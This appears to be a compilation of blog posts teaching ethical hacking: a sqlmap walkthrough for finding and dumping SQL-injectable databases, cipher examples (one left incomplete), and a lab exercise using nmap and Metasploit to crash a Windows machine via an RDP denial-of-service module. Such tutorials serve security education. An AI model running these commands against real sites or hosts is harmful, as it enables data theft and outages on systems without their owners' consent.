Attacking Web Application: SQL injection : For Education Purpose Only

Data is one of the most vital components of information systems. Database powered web applications are used by organization to get data from customers. In the Web application attack, there are different types of attacks such as buffer overflows, SQL injection, cross-site scripting and distributed denial-of-service (DDoS) attacks.

SQL Injection

SQL is the acronym for Structured Query Language. It is used to retrieve and manipulate data in the database. SQL Injection is an attack that poisons dynamic SQL statements to comment out certain parts of the statement or appending a condition that will always be true.

Sqlmap 

Sqlmap is one of the most popular and powerful sql injection automation tool out there. Given a vulnerable http request url, sqlmap can exploit the remote database and do a lot of hacking like extracting database names, tables, columns, all the data in the tables etc. It can even read and write files on the remote file system under certain conditions. Written in python it is one of the most powerful hacking tools out there. Sqlmap is the metasploit of sql injections.

Vulnerable Urls

Lets say there is a web application or website that has a url in it like this

http://www.site.com/section.php?id=1

and it is prone to sql injection because the developer of that site did not properly escape the parameter id. This can be simply tested by trying to open the url

http://www.site.com/section.php?id=1'

We just added a single quote in the parameter. If this url throws an error or reacts in an unexpected manner then it is clear that the database has got the unexpected single quote which the application did not escape properly. So in this case this input parameter "id" is vulnerable to sql injection.

Hacking with sqlmap

Now its time to move on to sqlmap to hack such urls. The sqlmap command is run from the terminal with the

sqlmap ‐u http://www.site.com/section.php?id=1

The above is the first and most simple command to run with the sqlmap tool. It checks the input parameters to find if they are vulnerable to sql injection or not. For this sqlmap sends different kinds of sql injection payloads to the input parameter and checks the output. In the process sqlmap is also able to identify the remote system os, database name and version.

So the sqlmap tool has discovered the operating system, web server and database along with version information. Even this much is pretty impressive. But its time to move on and see what more is this tool capable of.

Discover Databases

Once sqlmap confirms that a remote url is vulnerable to sql injection and is exploitable the next step is to find out the names of the databases that exist on the remote system. The "--dbs" option is used to get the database list.

sqlmap ‐u http://www.sitemap.com/section.php?id=1 ‐‐dbs

Find tables in a particular database

sqlmap ‐u http://www.site.com/section.php?id=1 ‐‐tables ‐D Databasename

Get columns of a table

sqlmap ‐u http://www.site.com/section.php?id=1 ‐‐columns ‐D Databasename ‐T tablename

Get data from a table

sqlmap  -u http://www.site.com/section.php?id=1 --dump -D Databasename -T tablename

Hill Cipher Encryption/Decryption

Hill Cipher belongs to a category of  Block Ciphers and Ployalphabetic ciphers.

• In a Hill Cipher , the key is a Square matrix of size m x m in which m is the size of block.

Encryption:

C.T = (P.T * Key   ) mod 26 

Decryption:

P.T = (C.T * Key^-1  ) mod 26

The Key matrix in the hill Cipher needs to have a multiplicative Inverse.

^Example:

^{Perform Encryption/Decryption on Given Plain Text "Attack is Tonight" .} 

P.T = (C.T * Key^-1  ) mod 26























Ref: 

AES Mix Column Transformation With Example

The Advanced Encryption standard (AES) is a symmetric-key block cipher published by NIST in 2001.

To provide Security, AES uses four types of transformations:

1. SubBytes
2. ShiftRows
3. MixCloumns
4. AddRoundKey

Mix Column transformation operates at the column level.The bytes in the state column and constants matrix are interpreted as 8-bit words (or polynomials) with coefficients in GF(2)

• Multiplication of bytes is done in GF(2^8) with modulus  (x^8+x^4+x^3+x+1)
• Addition is the same as XORing of 8 bit words
• In AES a byte that can be treat as a single entity ,it represented in Hex form.

     Example 8 bit 10001100  represent in 8A  in Hex

[ 02 * d4 ]  + [ 03 * bf ] + [01 * 5d ] + [01 * 30 ]

convert each Hex data into Binary  Example:

• convert  binary to equivalent polynomial              
• Example: 11010100 -> x^7 + x^6 + x^4 +x^2

t1=[ 02 * d4 ]   
   =[00000010] * [11010100]  
   =convert binary to equivalent polynomial  
   =x * (x7 + x6 + x4 + x2 )
t1= x8 + x7 + x5 + x3

t2 =[ 03 * bf ]   
    =[00000011] * [10111111]  
    =(x+1) * (x7 + x5 + x4 + x3 + x2 + x +1)
t2=(x8+x6+x5+x4+x3+x2+x+x7+x5+x4+x3+x2+x+1)
in GF(2) Addition is performed with XOR so same polynomial degree is cancelled out.
t2 =x8 + x6 + x7 +1 

t3=[01 * 5d ]  
   =[00000001] * [01011101]   
   =1 * (x6 + x4 + x3 +x2 +1)
t3=x6 + x4 + x3 +x2 +1

t4=[01 * 30 ]

   =[0000 0001] * [0011 0000]

   =1 * (x5 + x4)

t4= x5 + x4

final ans=  t1+ t2 + t3 + t4

             = x8 + x7 + x5 + x3 +x8 +x7 +1 +x6 +x6 +x4 +x3 +x2                                    +1 +x5 +x4 

  in GF(2) Addition is performed with XOR so same polynomial degree is cancelled out.

             =x2

             =0000 0100

final ans=04 (in Hex)

Ref

Parrot Security OS 2.1 Installation Steps in Virtual Box - Hacking OS - Tutorial

Parrot Security OS (or ParrotSec) is a GNU/LINUX distribution based on Debian. It was built in order to perform penetration tests (computer security), Vulnerability Assessment and Mitigation, Computer Forensics and Anonymous Surfing. It has been developed by Frozenbox's Team.

For More Details visit :
https://parrotsec.org/features.fx#specs

OPHCRACK- Hacking Tutorial- Windows XP/7/8/10 Password Crack within 90 Seconds ...!!!!

Ophcrack is a free Windows password cracker based on rainbow tables. It is a very efficient implementation of rainbow tables done by the inventors of the method. It comes with a Graphical User Interface and runs on multiple platforms.

Practical approach to study Scanning and Enumeration Techniques.

Warning:

Objective of this blog is to learn about finding system vulnerability and security issues .Never try any method of hacking to any other IP address of any site, government web site or server etc. Because it is under Cyber _Crime.

For education propose you can choice your friends/Lab IP address.

Anybody Using this blog for malicious purpose then I am not responsible. it will under cyber crime.

Scanning and Enumeration- Second Step Of Ethical Hacking.

After Completing 1st step of Ethical Hacking: Information Gathering, Will perform step 2

Scanning:

Scanning is a common technique used by a penetration tester to find out the open doors,

Enumeration:

Enumeration is the first attack on target network, enumeration is the process to gather the information about a target machine by actively connecting to it.

Q:1 Using Scanning Which information can found?

Q:2  What is open port, null session,reverse_tcp?

Q:3 Study nmap and metasploit software of kali linux.

Q:4 Understand following terms:

       1. Vulnerability

       2. Exploit

       3. Payload

Q:5 Exercise

Ping target Machine to check is it live?

       1. Find open ports of Target Machine.

     $nmap –T4 –A –v Targetpcip

      (check 445 port is open?)

 2.  Gather Operating system Information of Target Machine.

  Goto--> Terminal

   Type

   $ msfconsole

    msf>use auxiliary/scanner/portscan/syn

     > set RHOSTS targetmachine ip

      >set PORTS 445

      > run

 if you succeed then

    Note:  TCP port 445 which is used for SMB over TCP. The SMB (Server Message Block) protocol is used among other things for file sharing in Windows 

Again goto terminal--> your home dir

-Find Operating system type and version

- Windows having more vulnerability

$ msfconsole

msf> use auxiliary/scanner/smb/smb_version

>set RHOSTS Targetmachineip

>run

        3. You found target machine's OS version- now find its vulnerability and perform attack

 $ msfconsole

 msf> use auxiliary/dos/windows/rdp/ms12_0_020_maxchannelids

>show options

>set RHOST targetip

>exploit    

Check target PC. (Blue screen error)

4.      What are the countermeasure for this attack?

5.   Demonstrate any two other vulnerability of Windows or Linux.